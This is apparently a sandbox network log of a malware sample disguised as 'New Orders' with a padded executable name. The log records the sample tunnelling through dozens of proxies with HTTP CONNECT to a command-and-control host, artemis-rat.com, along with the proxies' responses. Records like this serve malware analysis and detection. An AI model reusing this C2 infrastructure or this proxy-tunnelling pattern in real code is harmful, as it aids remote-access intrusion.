                                                                                        Mar 11, 2024 16:16:47.244096994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1673192.168.2.954745178.253.236.13980807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.244188070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.598393917 CET202INHTTP/1.0 404 Not Found
                                                                                        Content-Length: 719
                                                                                        Content-Type: text/html
                                                                                        Date: Thu, 02 Apr 1970 01:07:35 GMT
                                                                                        Expires: Thu, 02 Apr 1970 01:07:35 GMT
                                                                                        Server: Mikrotik HttpProxy
                                                                                        Proxy-Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1674192.168.2.955002140.84.176.2464437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.244278908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1675192.168.2.95500943.153.174.44437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.341852903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1676192.168.2.955010140.84.176.2464437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.341851950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1677192.168.2.954846199.187.210.5441457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.346740961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1678192.168.2.95474313.234.24.11631287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.347265959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.755994081 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1679192.168.2.954862162.247.243.167807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.347749949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.517839909 CET159INHTTP/1.1 400 Bad Request
                                                                                        Connection: close
                                                                                        Content-Length: 15
                                                                                        content-type: text/plain; charset=utf-8
                                                                                        x-served-by: cache-lax-kwhp1940092
                                                                                        Data Raw: 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74
                                                                                        Data Ascii: invalid request


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1680192.168.2.952729147.12.46.6231287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.349275112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.760792971 CET1254INHTTP/1.1 403 Forbidden
                                                                                        Server: squid/3.5.28
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 952
                                                                                        X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                        Content-Language: en
                                                                                        X-Cache: MISS from ah_test
                                                                                        Via: 1.1 ah_test (squid/3.5.28)
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d 6f 6e 2c 20 31 31 20 4d 61 72 20 32 30 32 34 20 31 35 3a 31 36 3a 34 37 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Mon, 11 Mar 2024 15:16:47 GMT</p></div></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1681192.168.2.954868138.68.60.880807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.350277901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.680896997 CET28INHTTP/1.1 400 Bad Request


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1682192.168.2.954283123.200.22.1856787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.395658016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1683192.168.2.954823103.23.100.141457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.398684978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1684192.168.2.95029794.131.203.780807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.399101019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.354327917 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1685192.168.2.95426245.11.95.16552147672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.409259081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.164063931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1686192.168.2.954824111.90.150.10910807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.417196035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1687192.168.2.954896148.135.46.24231287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.417437077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.945292950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.445553064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:13.573424101 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1688192.168.2.954729185.216.18.138445507672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.422704935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1689192.168.2.954841176.98.81.8580807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.422842979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1690192.168.2.954930104.16.207.86807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.429470062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.585059881 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1691192.168.2.954939104.16.195.74807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.429579973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.585165024 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1692192.168.2.954947192.154.246.9690007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.435851097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1693192.168.2.954827139.59.1.1480807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.461982012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.874943018 CET28INHTTP/1.1 400 Bad Request


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1694192.168.2.954970104.18.44.93807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.479243994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.635726929 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1695192.168.2.954974104.20.75.69807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.489095926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.643414974 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1696192.168.2.95491383.136.219.140807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.512779951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.718161106 CET805INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                                        Content-Length: 613
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
